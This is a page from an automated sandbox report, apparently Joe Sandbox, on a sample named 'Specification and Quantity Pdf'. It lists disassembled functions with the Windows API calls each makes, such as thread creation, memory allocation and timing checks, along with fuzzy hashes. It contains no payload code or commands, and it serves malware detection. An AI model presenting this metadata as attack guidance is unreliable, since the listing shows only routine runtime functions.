Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
API String ID: 3403879507-2841289747
Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction ID: e0bcb563fa14f080c14f61cf2ffc4e97c8d221a3b0f3471ecc44d960a1fe1b8f
Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction Fuzzy Hash: 85414B23B3C69681E6C1BB61A8026B9A391AF51784FE84072E94D7B6D6CF2CF415C721

Function 00007FF773C554E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF773C55595
RaiseFailFastException.KERNEL32(?,?,?,00007FF773D0E640), ref: 00007FF773C555C1
RaiseFailFastException.KERNEL32(?,?,?,00007FF773D0E640), ref: 00007FF773C555FA

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF773C555E6

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction ID: 474919a51fc7674c2d61abcf4138c30d766359b1d1f153d26206b33bdab320c6
Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction Fuzzy Hash: 50411A77A39A4286EBD1BF19E440379B3A1EB44784FE44036EA4E623E0DF3DE5518760

Function 00007FF773C5BA80 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF773C5BAA1
SetThreadPriority.KERNELBASE ref: 00007FF773C5BABD
ResumeThread.KERNELBASE ref: 00007FF773C5BAC6
CloseHandle.KERNELBASE ref: 00007FF773C5BACF

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Thread$CloseCreateHandlePriorityResume
String ID:
API String ID: 3633986771-0
Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction ID: ae82fe34af2857e42926035cb9f85358eaf3ff1bad6bd4b97d9bbc10bba5d4b2
Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction Fuzzy Hash: 1FE065E6E39B0182EB54ABA1A814335A3507F99BD9F885034CDAE16360EF3C91998610

Function 00007FF773C60E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF773C60E67
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF773C60F2C

Strings

@, xrefs: 00007FF773C60F24

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction ID: 8727b1e25667a36421b8e91ef39160ad6aed7000b8794b8b81bf820907b85c49
Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction Fuzzy Hash: A9411423B3DB2681F9D6DA369510339D296AF49BC4F48C231E94E32784FF3CE4818612

Function 00007FF773C92320 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C92360
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C923D6
EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C9242B
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF773C7F9D9,?,?,?,?,?,00007FF773C8E9FF,?,?,?,00007FF773C688C3), ref: 00007FF773C92451

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
Instruction ID: 84b00d6dfab54f9fcbd9111db25b7e63748f77570db79cdbfc6cd5445c612cad
Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
Instruction Fuzzy Hash: BD315823E3C61A81EAA0BB55E8803B9B258BF54744FD60136D9CD672D1AF3CE49183B1

Function 00007FF773C616E0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF773C651C8,?,?,0000000A,00007FF773C64220,?,?,00000000,00007FF773C5DBB1), ref: 00007FF773C61707
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF773C651C8,?,?,0000000A,00007FF773C64220,?,?,00000000,00007FF773C5DBB1), ref: 00007FF773C61727
VirtualAllocExNuma.KERNEL32 ref: 00007FF773C61748

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction ID: e9d4f187fd5553a36860d2e20705ae4a892a082d715808736dfb383d97d8103f
Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction Fuzzy Hash: 46F0AFB2B286D1C2EB609B06F400219A760AB49BD9F884138EF9C27B58CF3DD5818B10

Function 00007FF773C6759B Relevance: 3.1, APIs: 2, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF773C675FE
GetTickCount64.KERNEL32 ref: 00007FF773C67683

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: e77201ca6bf2b5c6eab2984a94a29268fc8629bbea3a1e3fd04f15228a9aecdf
Instruction ID: 67899a9ebf5fb4be3504640e38cd748767db2b75b1ba551cc96734b17de5db07
Opcode Fuzzy Hash: e77201ca6bf2b5c6eab2984a94a29268fc8629bbea3a1e3fd04f15228a9aecdf
Instruction Fuzzy Hash: 8F418C33E3C642C1FAE4BBA49956279F391AF00788F958832C94D237E1DF3DE4418620

Function 00007FF773CBB610 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF773CBAC51,?,?,?,?,00007FF773C5FCD1,?,?,?,00007FF773C60254,00000000,00000020,?), ref: 00007FF773CBB62A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF773CBB640

Part of subcall function 00007FF773CBB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF773CBB92D

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction ID: 17b1ab10712b70be13b5b2f40f6dadb0fb41d4a9278d0f4480f032ec19047ace
Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction Fuzzy Hash: 3EE0E202E3950B01FDEE32B624A60B9D1800F5B7B0E9C2B30D97E652C2AD1CA8968138

Function 00007FF773C77A30 Relevance: 2.6, APIs: 2, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF773C92480: EnterCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924C4
Part of subcall function 00007FF773C92480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924EE

EnterCriticalSection.KERNEL32 ref: 00007FF773C77B43
LeaveCriticalSection.KERNEL32 ref: 00007FF773C77B64

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction ID: 76d069a1f07a81ee0a4b026a1582d1b1bda7e56573a8e8d79e942f9b0c66f59a
Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction Fuzzy Hash: 1841BD63A3C64A81EA80AB75D841274B3A0AF04BF5F944336CD7CA72D4DF2CE05183A0

Function 00007FF773C608D0 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF773C60944

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction ID: 826e961ea2805d525a122c686fbf815c69c37e9f567a6298b54dc91fe9f28c97
Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction Fuzzy Hash: 5231E133B29B6281EA54EB16940016AA3E4FB49BD4F848135DF4C37BC5DF38D462C360

Function 00007FF773C92480 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924C4
LeaveCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924EE

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction ID: d6aef40a25e8b582d00839308efd7fd86b5f6e90a03217377b3057e12861c8c6
Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction Fuzzy Hash: 69015223D3C55680F6E0B795E8842B9B794AF40790FD60132D5DD735E19F2CE4A1C7A0

Function 00007FF773C616A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF773C616B6
VirtualFree.KERNELBASE ref: 00007FF773C616CC

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction ID: a06a41cf0677db154217cdf8cb5c4afb77c509dfa89f487afe57bd7c8c38c9af
Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction Fuzzy Hash: 1AE0C275F3A501C6EB98B763A8426246292BF9AB45FC48038C80D17350DF2DA11A8B20

Function 00007FF773CF2890 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF773CF27CF,?,?,00000030), ref: 00007FF773CF28E2

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
Instruction ID: 348467d66634e96c99a22eb1264d2a29b9d180e906e2c112bc9c65a5fd79db0f
Opcode Fuzzy Hash: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
Instruction Fuzzy Hash: F821B327F3C20754FB90FA62AC612BE93A05F54348FE44036EE4D676C7DE2CE5428220

Function 00007FF773C674AB Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF773C674F5

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
Instruction ID: 11a2bf041061e66f0f5b1bcffb93577a15523e882e8669ea97e1e8e01522b4f2
Opcode Fuzzy Hash: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
Instruction Fuzzy Hash: 82112463F38741C2EA81EA2194026B5A390AF897B4F985731EE6D637C6EF2CD4428750

Function 00007FF773C54930 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF773C5B6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF773C5B6A4

Part of subcall function 00007FF773C5CA20: VirtualQuery.KERNEL32 ref: 00007FF773C5CA52

RaiseFailFastException.KERNEL32 ref: 00007FF773C549B6

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
